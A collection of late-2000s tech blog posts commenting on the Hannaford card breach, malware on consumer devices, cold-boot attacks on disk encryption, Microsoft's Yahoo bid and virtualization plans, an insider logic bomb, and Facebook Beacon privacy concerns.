The Fulcrum
Document Actions
Encryption at the POS
As any Hannaford exec will tell you, the last place you want to secure is the first place hackers will target. As the cliché goes - a chain is only as strong...
In this case, although details are quite nebulous, it appears that malware running on internal servers intercepted credit card data as the cards were swiped (plaintext data is sent from the POS terminals to the processing servers before the data is encrypted, so anyone snooping right in the middle could easily get access to the entire card data), and then simply shipped the info off to the hackers.
Really simple operation, but how did the malware get inside the internal servers? There are a few ways:
a. Someone used it to surf the 'Net, and probably downloaded it by mistake
b. Someone planted it on purpose (inside job)
c. Hackers got in from outside and planted the program
The company will not really say what happened, so the possibility that it was an inside job is quite high.
Steps the company has taken to avoid such illegal interception include encrypting the data right at the POS, having IBM monitor the network for suspicious activities and so on. This, thus, is another case of bolting the barn...although it is a sure deterrent to hackers planning the same method of stealing information in future.
The problem is hackers will probably find a way around it; they always do. The PCI-DSS standards (see one of my previous blogs) only regulate the encryption of data when it reaches the servers and not before or during, so that is definitely a weakness.
Further, as the article in the link notes (and is so true anyway), retailers depend badly on the software vendors to update their software/patch issues and vulnerabilities, and overall make sure their product is not a gateway for hackers to drill into the enterprise and steal information.
One critical step would to monitor INTERNAL traffic (in terms of always monitoring who accesses sensitive servers, implement a strict ACL, and checking ALL packets that leave the servers - especially those that break known patterns/signatures).
Doing extensive background checks on staff that must have access to these machines should be made mandatory, and any unauthorized attempts to peek at the database or perform any kind of illegal operation should result in immediate termination, no exceptions. Quite obviously (as before in my earlier blogs) I am not advocating tyranny at the workplace, just prudence/caution/curiosity- and lots of it.
Hacking is done by humans - not machines or software, although they're indispensable in meeting their nefarious goals. The instigator is still a living, breathing human; so any security plan that mindlessly targets malware, viruses, worms, trojans etc without taking into account the human element (especially employees and also the psychological aspects of hacking/hackers) is doomed to fail.
For most large corporations that deal in data (finance, medicine, retail etc) there is nothing more horrific than a panicky call in the middle of the night from the sys admin. Don't let it happen to you - tighten your network; encrypt; monitor; adjust; implement; monitor.
Many employees treat lunch-time as a somewhat sadistic date with their computers - so that means plugging in various devices to their hapless desktop/notepad and torturing it with downloads of firmware upgrades, content, and syncing up mail/contacts etc. Not an issue per se, of course, and in fact this may increase productivity by making employees feel more 'at home' and comfortable at their workplace - as long as the actions do not constitute a violation of corporate policies, needless to say.
However, the risk is that some of these devices - which you'd expect to be 'pristine' and 'untouched' may be having a nasty surprise in store for you (and for your IT team that must clear up the gory mess).
http://ap.google.com/article/ALeqM5j5sV-97QAoIse_DNzmQ6bD6oKXJwD8VCQIK80
It appears that many of these problems originate in devices manufactured in - where else? - China, where a careless tester may be plugging in these mini-computers to their stations for a final validation step, and inadvertently transferring the evil payload in the process.
Where this could be a REAL threat to a country's security is when this corruption happens DELIBERATELY, with malicious intent. So, imagine a defense dept official plugging in his/her child's iPod to their office laptop to download music or troubleshoot - and WHOOP - you got a password stealer installed stealthily. You can imagine the rest.
I've previously noted on this blog on the risks of USB ports and CD/floppy drives on sensitive computers. Just glue them up if there's no need for them to be available. I'm not about to preach on the physical aspect of a company's security policy, but having steel doors is not enough. And for those that think AV solutions are the panacea for such problems, please note that some of these miserable little programs DISABLE the AV so no alarms are raised.
Happy listening!
_____
tags:
For those that consider disk encryption to be the ultimate tool in fending off hackers and data thieves, a short video should be a strong wake-up call.
Watch this, and be fascinated (maybe with horror):
http://www.youtube.com/watch?v=JDaicPIgn9U
Princeton researchers have found a couple of ways to get around BitLocker etc. I won't bore you with the details - just read this rather informative article
http://www.news.com/8301-13578_3-9876060-38.html?tag=nefd.lede
What's surprising is the EASE with which all the security boundaries were crossed (smashed, actually) and the data retrieved. When a company promises that hard disk encryption will save you from lost data because the thief won't be able to get to your information, they're only half right. If your computer was ON or in sleep mode (or in screensaver lock mode) they can easily get to the RAM and harvest all the memory in it - then simply look for keys.
The best way is to power down your computer and make sure it's off for at least 4-5 minutes, otherwise it's way too easy to get to the innards.
The weakness lies in the fact that the encryption key is stored in RAM - quite obvious because data needs to be en/decrypted on the fly, and the only way this can be done efficiently is by storing it in RAM. The DRAM chips are supposed to lose their data right at power-off, but that's not always true. The chips keep the content alive without any refresh for up to 10 MINUTES. That's a lot of time.
So once they have the computer the hackers would simply remove the chip after spraying it with duster liquid (so it cools it down to -50 deg), and that extends the life of the data on the chips quite a bit. Then they'd copy over the content to their machine and just look for the key. Simple.
Or, they can boot from an external disk and run a program that'll dump the contents of memory and simultaneously retrieve the key as well.
What does this mean for all those people that believed disk encryption was the cure-all? Well, it's still better to have this protection than not to have it, but be careful that you don't have your computer on if you must leave it unattended for even a minute. For any reason whatsoever, don't lose track of it, of course, even for a minute, but if you must...
The article discusses some countermeasures, but the IT organization that was sold on this technology now is probably getting bombarded with all sorts of questions and concerns, and justifiably so.
The only safe way to prevent data theft is to prevent the theft of the computer itself.
The recent unsolicited bid from MS for YAHOO was not very surprising. Considering that Y has been ailing for some time now - with declining ad revenues and search statistics, along with a somewhat slow-and-bloated feel to the entire company, someone HAD to do something. MS decided to be that someone.
How much sense does it make? Not much. Not much at all. MS is known for its aggressive marketing, product growth, and pushing strongly into areas that have already been cleared for it by others - and very often overrunning the precursors in the process. However, it is not very much known for innovation.
Y, on the other hand, was one of the first true innovators on the Web, bringing a 'directory' approach to search. However, as the Web grew exponentially, people had little time or patience to look through subdirectories and such -- they just wanted the ability to type in something and see something useful come up quickly.
Google satisfied that need splendidly. Its simple, understated interface with just three or four links, and two simple buttons, did it all. Magic, nearly every time. Witness its torrid revenue growth and the merciless streak of profitability, a portion of which comes at the cost of others, mostly Y and MSN (which is, in my opinion, the most anemic of all search engines).
Others somehow stumbled along, while G, with the incredible muscle of its finances and the fantastic brains behind it all, simply left everyone dazed (and tottering).
Little wonder that it cried foul at MS's offer; and even less surprising that it offered a 'helping' hand to Y. But I think secretly G wants MS to get into Y the way a dying man gets trapped in quicksand. Y just announced it would lay off 1000 people worldwide; it has shut down its Photo division, and probably will shutter many others that are simply not contributing to the bottom line. That leaves a WHOLE lot of disgruntled, and in many cases, very talented people just waiting to jump ship.
Enter MS - to hasten the fall, and enter G - to welcome the jumpers.
Y is decaying; I have no doubt about it. Jerry or Terry - same results. Its
Further, while Y has a startup-type outlook, MS is on the other side of the Net divide: Stodgy, self-important, dull, and a penchant for monopolistic tendencies. Therefore, a clash of the cultures is definitely not to be ruled out.
Overall, not a very rosy picture there.
However, as my wife will occasionally point out, not all of my notions are accurate to the last detail all the time. Besides, every now and then I'll come up with a non sequitur or two: Because both MS and Y are competition to G, combined they'll surely kill G.
Yeah, right.
Anyway, the mise-en-scene has been set - let's get the popcorn and watch the fun unfold!
Further to that, the govt, which seems to have absolutely no take on such issues, needs to get off its lazy behind and do something meaningful, like legislating strong penalties for careless and negligent organizations.
In a series of annoucements that could pressure VMWare stock, MS made it clear that it's going to go after virtualization along multiple channels, and with great determination. Their intent to purchase Calista, a desktop virtualization presentation product, falls in line with what they hope to do with the technology, and where they want to apply it.
One must remember that desktop virtualization is still new and hasn't really become popular yet, but should take off like a rocket once corporate types figure out it's cheaper, easier, more secure, and more reliable to push out a preformed virtual image to employees' machines than any other solution.
Now that the Server 2008 will have Hyper-V built-in - and with the same OS layer that they sell so much of, the teaming up with Citrix (which purchased XenSource) will further help consolidate their position as being highly committed to the VM platform. VMWare must now fight back with new relationships/partners and technologies that will improve the speed, response, security, and performance of their products in general. Although they have a commanding lead in the market and are seen as the leaders, MS thrives on starting late and catching up then overtaking. So, despite any delay or kludgy/buggy interfaces that one may encounter in MS' first offering, you simply can't write them off. They have the money, the resources, and the doggedness to go after *anything* - however dumb a move it *may* seem to outsiders.
To be sure, the OS is still their main source of revenue; however, they'll take anything they can get in the fresh, still-quite-untested market of VMs. No question it's a new source of revenue (and customers), and it's also one that's bound to grow very fast, and by large amounts. The 'green' message behind VMs helps a lot, plus space and time savings. The Citrix partnership could hold back those companies that want to move from MS to Linux and keep them safely ensconced in the MS fold.
Although analysts seem to be confident about VMWare's current strategy and product direction, they'd do well to keep looking over their shoulders.
All in all, it's a VERY positive announcement from MS, but let's hope they don't come up with another Zune (if they did, then with a little stretching one could call VMWare the Apple of VMs).
_____
tags:
Continuing in the grand tradition of using bad puns as titles, we look at the weird case of Lin Yung-Hsun, a Sys Admin, who in his great wisdom thought it fit to plant a logic bomb (http://en.wikipedia.org/wiki/Logic_bomb) because he was nervous about an upcoming corporate restructuring (that could result in his getting laid-off).
You can read more about this sadly misguided person's story here:
http://www.informationweek.com/news/showArticle.jhtml?articleID=205601393
The ultimate irony is that he was kept while other SAs were shown the door.
In previous postings I've mentioned that the biggest threats often come from insiders - disgruntled employees, saboteurs that get employment in the target company so they can perform destructive actions, corrupt workers and so on.
Obviously the idea is not that one should distrust their workers - on the contrary one should trust them completely, but while still taking protective actions, such as routine scans of all admin commands/actions; sweeping the disks of critical servers to check for any obvious problems and so on, and maybe even having a trusted party check important systems for signs of unauthorized or unacceptable activities.
While there are pretty good tools to prevent virus/DoS/hacking attacks, none that I know of protect against such deviously simple yet hard to find attacks. Unless AV software can start incorporating intelligence (singatures) of destructive behavior it won't be simple/possible/easy to stop such people.
_____
tags:
I'd noted in a blog post on Nov 7 that DELL might purchase a storage hardware or technology within the next 3-6 months. I was right, of course, but didn't realize how soon I'd be proven right. The company is 'The Networked Storage Company' and the founder is a former EMC UK executive.
Their model is brilliant - simple yet very effective. No question that DELL saw the gem and grabbed it. The only thing is, their website (TNWSC.com) states that they are 'fiercely independent' in the sense that they do not owe allegiance to any one vendor. However, with DELL now buying them out, how does that change things?
From their website's FAQ section:
Check out their FAQ here: http://tnwsc.com/faq's.html (I'm not a fan of apostrophes where they DON'T belong, especially in plurals).
TNSWC do not recommend solutions, yes, and they have a methodology called 'Point of Proof' which DELL is going to market, but still the idea of a previously independent entity flaunting its disinterest now getting bought out by a storage vendor is somehow a bit odd, although I'd think it will make no difference in how TNWSC will continue to work or how DELL will treat its old (and new) customers -- because ultimately credibility (and honesty) is everything. As long as they continue to save their clients tons of money and guide them through the labyrinth of storage acronyms and technologies who cares! I look forward to seeing how DELL exploits this to-be-hot-soon market (that of IT Storage consulting). Companies have invested millions (and billions) of dollars in their complex IT (storage) infrastructures, so if they want to see returns who can blame them! As an analogy I'd say such firms are like the patient advocacy firms - they promise results for your investment; no more no less. See http://en.wikipedia.org/wiki/Patient_advocacy: another hot trend considering healthcare costs and a seeming apathy towards the very people that fund the system - the patients.
****
Another curious thing I read recently related to IBM's release of the semantic search (for email), available on their AlphaWorks site (http://www.almaden.ibm.com/cs/projects/avatar/)
The first thing that'll come to anyone's mind is Google Desktop Search (GDS) - a very powerful and unimaginably quick search tool that I used for a long time before the index became a bit much for the disk (I have a pathetic 12 GB disk). Now, if you had a 100+GB disk with a lot of documents/email etc you'd really want GDS. GDS however does a (I think) strictly string-search approach - no 'intelligence' or 'rule-based search'.
The new tool from the Avatar research team does a lot of similar things
-- it mines unstructured information and renders them searchable
(albeit in an 'intelligent' fashion -- heuristics, really; so watch out
for cognitive biases). So what's new? I know that Stratify (used to be known
as Purple Yogi) used to do the same. I think Stratify was funded by
In-Q-Tel, apparently the funding arm of the CIA.
The problem statement posed by the researchers/inventors is nothing new - there's a whole lot of information that's just lying there, waiting to be found, associations waiting to be made, text waiting to be indexed. To make the process of digging through the dirt cleaner, quicker, easier, and accessible is an unenviable task. Imagine a corporate website that has individual blogs/mini websites/documents all over the place, containing sensitive, important, and critical material that's probably needed by many others (or they don't know that they need it). An index-and-search tool such as Google's SearchAppliance would be a great thing to have, but only to search for actual strings (again, I think they simply index and search - corrections from the knowledgeable welcome).
With IMB's OmniFind (Omni is overused to the point of being a cliche' now) you could type in, say, 'requirements gathering' and it will search even for something like 'how to create great requirements' or 'the art of successful project management' etc - you get the picture. I'd like to repeat that this is not a new area, but to my knowledge it's also not an area that's been developed very well in the consumer area (including corporate customers). And therefore such initiatives are most welcome as they'll help people do better searches and save a whole lot of time in finding the things they're looking for -- so they can be more productive and efficient.
Not to mention they'll REALLY help trial lawyers when they do e-Discovery (remember, all those rules that you're going to be punching in, creating associations and relationships) could become evidence - not just the results but also the RULES AND THE INTENTION(S) behind the rules as well.
Anyway, I'll give it a try and update this blog sometime next month with my findings on how good it is.
_____
tags:
Nothing much new here, but just to underscore the critical nature of education, enforcement, and effective action:
http://www.informationweek.com/blog/main/archives/2007/12/we_need_to_talk.html
John Soat talks about how end users take untold liberties with IT policies and probably take them as suggestions rather than mandatory rules. It's quite complex as to why this happens -- it's quite clear that they probably know what they're doing is wrong, but just not *so* wrong that they shouldn't do it.
See, the issue is that many of these areas are left in the gray part of 'can do or must not do' policies. And worse, I'm willing to bet that 99% of employees have NO IDEA what constitutes proper 'secure' behavior and what constitutes a violation of company policy and thus their employment contract.
Along with continual education, the only other way to make sure that corporate data doesn't leave the network is by using software to track the packets and ensuring they are not sensitive. To do that you'd have to get one of those 'anti leak' DLP software modules (like what Vontu/Symantec does) and establish clear demarcations between acceptable and non-acceptable information leaving the network.
Any practical ideas from readers?
_____
tags:
I call it Sneakcon - they call it Beacon, not much difference there when you find out that affiliated websites (affiliated with FB) - were sending your information to your friends on FB despite your having LOGGED out of their site.
How did they figure this out? Well, simple - network monitoring via WireShark (I saw it on the blog of the original CA researcher that found this activity). The idea behind Beacon was to send out info on your online habits to your friends on the site. However, soon people started complaining that the surprise element behind their surprise gifts were ruined because the intended recipient got to know of the purchase. Well, that's fine, and you can turn it off, but not even when you're logged off?? Whoa - that's serious breach of trust in my opinion.
As a reference, see this:
http://www.cio-today.com/story.xhtml?story_id=010000ZKE6WS
So, they track non-users as well - except that they will discard the data if it did not include an FB cookie saying it's an FB user - and then even if you were an FB user and even if you'd opted out of the 44 websites that work with FB, your info will STILL be sent except they won't process it (because you'd opted out). I don't think this is a good idea. Doesn't matter if you throw away the information or not: if I'm not an FB user you have NO RIGHT to my data. And who's to say the data is being REALLY thrown out? Who audits that?
You should know that you have to opt out ONE BY ONE - not all of the sites simultaneously. Couldn't be more painful than that. And considering how popular the site is, what if hundreds of companies choose to join the program. You'd have to constantly change your preferences to avoid opting in. It should be the reverse - unless you chose to opt in, nothing about you should be known to anyone.
This is why they are in very serious need of a customer privacy advocate, someone who can dispassionately identify such issues and guide the misguided person that chose to implement it so that people don't start abandoning the site or decide against joining it. I'm quite sure that many people have decided not to join FB after this fiasco. I know I won't.
_____
tags:
Forgot your password?
New user?
